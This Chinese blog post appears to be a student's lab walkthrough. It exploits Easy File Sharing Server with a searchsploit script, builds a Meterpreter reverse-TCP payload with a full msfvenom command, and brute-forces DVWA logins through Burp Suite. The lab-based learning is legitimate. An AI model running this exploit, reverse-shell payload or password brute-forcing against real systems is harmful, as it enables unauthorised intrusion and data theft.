首页 > 其他分享 >渗透测试的复现任务

渗透测试的复现任务

时间:2022-11-12 09:44:25浏览次数:46  
标签:exe 爆破 渗透 kali 端口 复现 测试 靶机

流程报告(WalkThrough WriteUp)

一、漏洞渗透测试

按照复现内容首先将easy file sharing server拖移到靶机(Windows)并解压

然后在kali虚拟机中使用nmap —sV 目标IP地址得到靶机的开放端口,得到443端口运行着上诉所说的程序并开始进行下部分操作

 

 

 

使用searchsploit命令得到下列图,并使用39009.py漏洞进行复现任务

 

 

 

 

 

成功连接到靶机并开启了他的计算机程序

 

 

 

 

远程控程序基础

首先在kali中生成被控端并将生成的程序进行虚拟机之间的拖拽复制

 

 

 

一开始连续拉了很多次都无法成功进行文件复制操作,经过网上咨询也无法成功。最后我将物理机的防火墙关闭并拖拽程序到相应靶机就成功了。

由于 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.32.128  lport=5000 -f exe -o /root/payload.exe

指令进行下载时kali虚拟机无法识别所以我参照网上的把指令换成了msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.32.128  lport=5000 -f exe -o /var/payload.exe

得到了另一个可运行文件

 

 

 

复制成功后使用msfconsole启动metasploit启动一个主控端

根据复现任务的pdf图片执行文件

 

 

 

然后用search指令搜索.txt文件得到相应靶机所有的文件最后根据自己需求下载文件即成功复现

 

 

 

 

二、burpsuit身份认证攻击

由于kali自带的浏览器一直无法打开相应的链接,无论是有无burpsuit的拦截功能的开启。

所以在同学的启发与指导下,使用另一个方向,将靶机Metasploitable2开启并登录他的dvwa界面(因为该dvwa的端口是80端口可以通过代理进行拦截)

 

 

 

构造字典,我们已经知道用户名,开始进行爆破,由于字典太长,爆破时间太久我们可以适当在前面加入正确密码减少时间(虽然这不符合常理)

 

 

 

 

 

 

 

 

 

 

一开始我爆破dvwa的第一个登录界面发现他们的爆破密码长度都是一样的,不明白其中的问题,然后我再试了进去之后的Brute Force界面的爆破发现了不同长度的爆破密码,所以与其他不同长度的密码即为正确密码

标签:exe,爆破,渗透,kali,端口,复现,测试,靶机
From: https://www.cnblogs.com/WXL0708/p/16882728.html

相关文章

  • zt 1588及其是测试和格式
    https://www.eefocus.com/test-measurement/293049IEEE1588及其测试方法简介2012-02-0820:46预计 18 分钟读完申请入驻>>1IEEE1588概述IEEE1588定义了......
  • Pytest接口测试框架实战项目搭建(二)—— tools公共方法封装
    一、前言在项目中我们要频繁地用到log日志、request请求方法、断言等,所以我们可以把这些常用的方法封装成日志,下面将逐个文件讲述下,不会讲太细,但会把源码贴出来,还有一......
  • 6、Redis_Jedis_测试
    1、Jedis所需要的jar包<dependency><groupId>redis.clients</groupId><artifactId>jedis</artifactId><version>3.2.0</version></dependency>2、连接Rdis注意......
  • 测试
    计算机网络书籍阅读nginx在何处接收请求,调试nginx,何时转发给php-fpm,然后php-fpm如何调用php从客户端发出http请求,到返回结果,中间每一步耗时测试,然后与apache对比,分析为何......
  • inux系统常用的150个命令/开发 运维 测试 安全
     线上查询命令和帮助2个man查看命令帮助命令的词典 help查看内置命令的帮助文件和目录18个ls-a-l查看目录的内容及属性 cd.当前目录..上级目录/根目......
  • onps栈使用说明(2)——ping、域名解析等网络工具测试
    1.ping测试协议栈提供ping工具,其头文件为“net_tools/ping.h”,将其include进你的目标系统中即可使用这个工具。……#include"onps.h"#include"net_tools/ping.h"/......
  • 【转行测试开发-HTML】(十)注释、独立编写页面和完成老师的题目
    上一节我们学会了锚点定位,从上到下的会用了,那么从底部往上会用了吗?比如底部有一个返回顶部的按钮,要求点击后回到页面的顶部。我们写代码来尝试下。先看看效果:点击红框里的......
  • 内网渗透-域内环境搭建
    一、前言想复习一下内网渗透,纠结好久到底使用vulustack直接启动环境来写文章,还是自己搭建环境,后来看反正最近没啥事情,自己搭建一个,正好复习一下,涉及到的漏洞环境之后的文......
  • Sqoop介绍以及安装测试
    一、Sqoop简介ApacheSqoop(TM)是一款用于hadoop和关系型数据库之间数据导入导出的工具。你可以通过sqoop把数据从数据库(比如mysql,oracle)导入到hdfs中;也可以把数据从hdfs中......
  • 软件测试
    一.selenium自动化测试---测试工具1.定位ByIDdriver.findElement(By.id(<elementID>))定位元素使用ID属性Bynamedriver.findElement(By.name(<elementname>))......